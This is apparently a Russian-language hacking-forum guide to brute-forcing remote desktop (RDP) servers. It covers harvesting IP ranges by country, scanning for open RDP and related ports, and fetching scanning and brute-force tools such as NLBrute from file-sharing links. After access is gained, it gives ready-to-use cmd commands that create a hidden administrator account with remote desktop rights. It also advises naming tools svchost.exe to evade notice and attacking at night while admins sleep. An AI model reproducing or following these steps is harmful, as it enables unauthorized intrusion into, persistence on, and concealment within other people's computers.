Брут дедиков. Так, как гайдов уже немало, постараюсь написать чего-нибудь нового.
Дедик - это удалённый пк, к которому можно подключиться с помощью стандартной программы Windows "mstsc.exe". Подключиться получиться, если на пк открыт определённый порт, вводимый нами при подключении. На дедике можно делать всё, что душе угодно(но лучше не надо, читай дальше).
Итак, что же потребуется для брута дедиков?
Диапазоны по странам можно взять с сайта (сканирование страны занимает очень много времени).
http://www.find-ip-address.org/ip-country/
http://www.ipaddresslocation.org/
http://www.proxyserverprivacy.com/ipaddress_range.php
Диапазоны по городу можно взять отсюда - 4it.me, есть очень точная база России.
А также, можно скачать программу IP-city и взять оттуда (обновил для вас списки ip в ней). Скачать, VirusTotal, HybridAnalysis.
Как получить ip-диапазоны:
Для обновления списков скачайте GeoLite Country CSV/ZIP и GeoLite City CSV/ZIP отсюда. Затем распакуйте csv файлы в папку с программой.
2. Я рассмотрю все самые лучшие программы для скана ip-диапазонов и какой подойдёт лучше для вас.
https://www.sendspace.com/file/z7ek8u - Скачать
Буду использовать GUI, так как в ней тот же функционал, что и в консольной версии.
Вставляем ip-диапазоны. Дальше прописываем порты. Стандартный порт - 3389.Окно со сканированием закроется само (не должно закрываться сразу).Rate - скорость сканирования, found - пк с открытыми портами (которые мы указали). После скана нажимаем "IPort", для того чтобы ip были не вида 192.168.1.1(от балды), а 192.168.1.1:3456.Готово!
Скачать программу. VirusTotal. HybridAnalysis
Буду использовать опять GUI, так как в ней тот же функционал, что и в консольной версии.
Выбираем нужное количество потоков "-T" и нажимаем "Start scan". Когда окно со сканированием закроется, вы получите ip-адреса (не должно закрыться сразу).
Готово!Скачать программу. VirusTotal.Упрощённая версия сканера ip-диапазонов.
Выставляем 3389 - стандартный RDP порт во вкладке "Port(s)". Жмём "Start" и дожидаемся ip-адресов с открытыми портами (которые мы прописали). Они сохраняются в txt файл "ScannedIp's" в папке с программой.Готово!
Спойлер: Tcp Port Scanner , если у вас пк подключён напрямую к внешнему роутеру (очень быстрый)
Скачать.VirusTotal.Использует новую технологию сканирования, благодаря подключению пк напрямую к выходящему в глобальную сеть роутеру.
Жмём options и делаем, как на скриншоте
Жмём "Start scan" и ждём результатов.Там, где надо прописать порты, пишем 3389 - стандартный порт RDP.
Готово!
Порт 3389 знает каждый 2-й пользователь. Поэтому дедики могут часто попасться уже брученные. Чтобы избежать этого, используем вот эти порты: 3350-3500,139, 4899,5900,4444.
Разъясню, за что какой порт отвечает простыми словами.
3350 - 3500 - просто стандартное подключение по "mstsc.exe". 139 - подключение к ftp серверу (имеем доступ к данным хард диска). 4899 - использует программа RAdmin. 5900 - vnc подключение (подробнее, тут https://habrahabr.ru/post/76343/). 4444 - червь W32.Blaster.Worm
После сканирования можете проверить на подключение RDP программой rdp solid scanner v2.1. Это уменьшит кол-во мусора в разы.
Скачать - https://mega.nz/#!0scxxaYA!yvvWAg59WXvBjwdOZaP3-Zwb1GADCHM-mwwilUXQgX8
Пароль - fuckav
3. Логины.
Главная истина - они не зависят от регистра. Т.е Админ или админ, разницы нет никакой. А ещё, они должны подходить к языку в стране.Для брута подойдут типичные логины (не делайте их слишком много, до конца жизни будете брутить)
Пароли.
Вот они уже зависят от регистра. Вот список самых частых паролей. Не делайте их тоже слишком много (максимум 1 мегабайт).
4.Скачать можно с темы на нашем форумеЗапускаем NLBrute 1.2. Переходим на вкладку "WORK FILES". В поле "Servers" выбираем ip-адреса (адреса, а не диапазоны!). Ну, остальные поля - понятно. Не забудьте нажать "Generate"!
Ставим настройки, советую, если мощный пк, ставить вот так (даже не грузит проц)
Убираем галку с пункта "Servers checking" (обязательно). И во вкладке "BRUTE" жмём Start. После закрытия программы можно нажать Continue!Good count - количество наших дедиков! Сохраняется в файле "good.txt".5. Вот и нашёлся первый дедик.Способ для новичков:
Способ для прошаренных (команды в cmd, для русской версии windows, замените ВАШ_ЛОГИН и ВАШ_ПАРОЛЬ на желаемые):net user ВАШ_ЛОГИН ВАШ_ПАРОЛЬ /add net localgroup Администраторы ВАШ_ЛОГИН /add net localgroup "Пользователи удаленного рабочего стола" ВАШ_ПАРОЛЬ /add reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ВАШ_ЛОГИН /t REG_DWORD /d 0 /fВсе программы храните в системных папках. Называйте их "svchost.exe" или "system.exe". Если дедик включён круглосуточно, то брутьте ночью, админы спят. В браузере используйте инкогнито и так далее.
PS знаю гайдов сейчас поданной теме жопой жуй, но я залил сюда, чтоб скидывать знакомым линк и сразу убрать вопрос, что такое дедик и как достать
PS весь софт юзайте на виртуалке или на песочнице, за потерю данных ответственности не несу